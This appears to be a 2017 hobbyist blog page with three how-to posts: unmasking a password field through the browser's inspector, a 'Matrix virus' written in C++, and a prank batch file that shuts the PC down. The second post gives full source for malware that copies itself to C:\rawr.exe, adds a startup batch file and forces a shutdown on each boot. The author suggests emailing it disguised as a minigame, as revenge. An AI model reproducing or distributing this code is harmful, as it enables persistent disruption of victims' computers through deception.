Sunday, August 20, 2017

How To Retrieve Password From Dots, Stars or Asterisk


Steps To Get Password :-

1. Select Dots That You Want To Convert.

2. Right Click On Selected Field.

3. Click On Inspect Element.

 4. Then A Footer Bar Will Appear ( See Screen Shot For Re



5. Then Find "Password". (See Screen Shot For Reference )

6. Change "Password" To "text" By Click On It.


7. Done!!!!!!Now You Can See The Password.
 


 

Tuesday, March 28, 2017

How to make a Virus (Destroyer) continued.......

Now i'm going to tell you make a Virus.
Make one called matrix.
Now remember this is not the answer to all your revenge needs.
The best way to get revenge is to make a FAKE virus that just scares the crap out of them.
If you want to do something constructive with a virus send it to someone who has written and forwarded one before, to stop them.
Heed my warning, but if you still want to ruin your life with jail, here you go.
Step 1- open notepad.
Step 2- paste this...
// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool minigame.
I recommend naming it as the game you say it is.
Hope you don't ruin someone innocent's computer.

Sunday, March 26, 2017

How to make a VIRUS

I'm sure that everyone dreamed just once to make a virus and spread him.I personally dreamed to make a big virus and spread it I recognize.Today I've found that you don't need any advanced skills to make a virus.Anyone can make one with a few simple mouse clicks.Today I'm telling you about a prank virus but if you are interested to know how to make a dangerous virus I'll tell you definitely. It's a promise.......

First of all right click on desktop> new>notepad
then copy and paste given content only :

@echo off
shutdown -s -t 60 -c "You have been hacked!"


You can write in “ ” whatever you want.
Then click on file > save as
Put the name with .bat e.g.: hello.bat
After that double click on that and BOOM
After 60 sec. your PC will be shutdown.
But you can prevent this want to know?
Follow these steps:
Click RUN, type shutdown –a and press Enter.

Good bye…..I’ll show you how to destroy a PC of your rivals.